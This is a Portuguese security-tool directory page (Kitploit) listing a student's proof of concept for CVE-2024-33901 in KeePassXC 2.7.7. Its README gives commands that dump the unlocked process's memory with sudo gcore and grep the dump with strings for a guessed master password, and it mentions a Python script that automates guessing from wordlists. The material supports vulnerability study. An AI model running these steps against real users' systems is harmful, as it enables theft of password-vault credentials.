Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-33901-ProofOfConcept — Pequeno programa que demonstra a vulnerabilidade CVE-2024-33901 no KeePassXC versão 2.7.7 | Kitploit
Ferramentas/GitHubGitHub/gmikisilva/cve-2024-33901-proofofconcept
Quebra de SenhasForensia de MemóriaAnálise de VulnerabilidadesExploraçãoExfiltração de DadosForensia Digital
GitHubgmikisilva/cve-2024-33901-proofofconcept

CVE-2024-33901-ProofOfConcept

Pequeno programa que demonstra a vulnerabilidade CVE-2024-33901 no KeePassXC versão 2.7.7

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
26há 1 anoAinda não revisado

CVE-2024-33901-ProofOfConcept

Programa curto que demonstra a vulnerabilidade CVE-2024-33901 no KeePassXC versão 2.7.7

O relatório para a disciplina pode precisar do código fonte vinculado, por isso criei o repositório para isso

Como replicar a vulnerabilidade

  1. Abra o KeePassXC e autentique o banco de dados
  2. Enquanto o banco de dados está autenticado, crie um arquivo de dump de memória para ele

Isso pode ser feito obtendo o PID, o que pode ser feito com este comando:

root@kitploit:~
ps aux | grep keepassxc

E então executando este comando: sudo gcore -o keepassxc_dump PID_HERE

Por exemplo, se o PID que você obteve foi 1234, então o comando teria que ser:

root@kitploit:~
sudo gcore -o keepassxc_dump 1234

3. Finalmente, você pode executar este comando: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"

Então se o PID fosse 1234, o comando seria:

root@kitploit:~
 cat keepassxc_dump.1234 | strings | grep "password guess here"

Uma vez que o arquivo de dump de memória é criado, o ataque pode ser realizado mesmo se o banco de dados for bloqueado novamente ou se o KeePassXC for fechado.

O código Python fornecido executa todas essas etapas e tenta múltiplos palpites de senha com base nos arquivos de texto fornecidos.

Baixar ferramenta